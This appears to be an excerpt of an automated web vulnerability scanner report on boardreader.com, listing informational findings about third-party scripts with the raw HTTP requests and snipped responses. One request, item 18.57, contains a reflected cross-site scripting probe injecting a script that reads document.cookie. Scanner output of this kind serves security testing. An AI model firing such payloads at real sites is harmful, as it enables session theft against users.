HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 07:26:47 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.47. http://boardreader.com/domain/2mdn.net/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/2mdn.net/x22

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /domain/2mdn.net/x22 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 19:12:55 GMT
Server: Apache
Pragma:
Cache-Control: no-store, max-age=21600
Expires: Thu, 03 Feb 2011 01:13:01 +0000
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 352
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.48. http://boardreader.com/domain/aol.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/aol.com

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /domain/aol.com HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:49:39 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:49:43 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.49. http://boardreader.com/domain/cafemom.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/cafemom.com

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /domain/cafemom.com HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:49:01 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:49:03 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.50. http://boardreader.com/domain/myegy.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/myegy.com

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /domain/myegy.com HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:49:12 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:49:13 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.51. http://boardreader.com/domain/nolanfans.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/nolanfans.com

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /domain/nolanfans.com HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:49:35 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:49:42 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.52. http://boardreader.com/domain/ratedesi.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/ratedesi.com

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /domain/ratedesi.com HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:51:06 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:51:35 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.53. http://boardreader.com/domain/sherdog.net previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/sherdog.net

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /domain/sherdog.net HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:49:23 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:49:59 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.54. http://boardreader.com/domain/ufc.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/ufc.com

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /domain/ufc.com HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:50:04 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:50:06 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.55. http://boardreader.com/domain/websitetoolbox.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/websitetoolbox.com

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /domain/websitetoolbox.com HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:49:12 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:49:19 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.56. http://boardreader.com/domain/worldmastiffforum.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/worldmastiffforum.com

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /domain/worldmastiffforum.com HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:49:26 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:49:34 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.57. http://boardreader.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

18.58. http://boardreader.com/info/about.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/info/about.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://www.google-analytics.com/urchin.js

Request

GET /info/about.htm HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:16:14 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verify-v
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.59. http://boardreader.com/info/agreement.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/info/agreement.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://www.google-analytics.com/urchin.js

Request

GET /info/agreement.htm HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:21:21 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verify-v
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.60. http://boardreader.com/info/contact.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/info/contact.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://www.google-analytics.com/urchin.js

Request

GET /info/contact.htm HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:17:34 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verify-v
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.61. http://boardreader.com/info/partners.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/info/partners.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://www.google-analytics.com/urchin.js

Request

GET /info/partners.htm HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:16:56 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verify-v
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.62. http://boardreader.com/info/plugins.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/info/plugins.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://www.google-analytics.com/urchin.js

Request

GET /info/plugins.htm HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:19:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verify-v
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.63. http://boardreader.com/info/policy.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/info/policy.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://www.google-analytics.com/urchin.js

Request

GET /info/policy.htm HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:21:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verify-v
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://hit.clickaider.com/clickaider.js"></script>
...[SNIP]...

18.64. http://boardreader.com/info/submit.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boardreader.com
Path:	/info/submit.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://hit.clickaider.com/clickaider.js
http://www.google-analytics.com/urchin.js

Request

GET /info/submit.htm HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
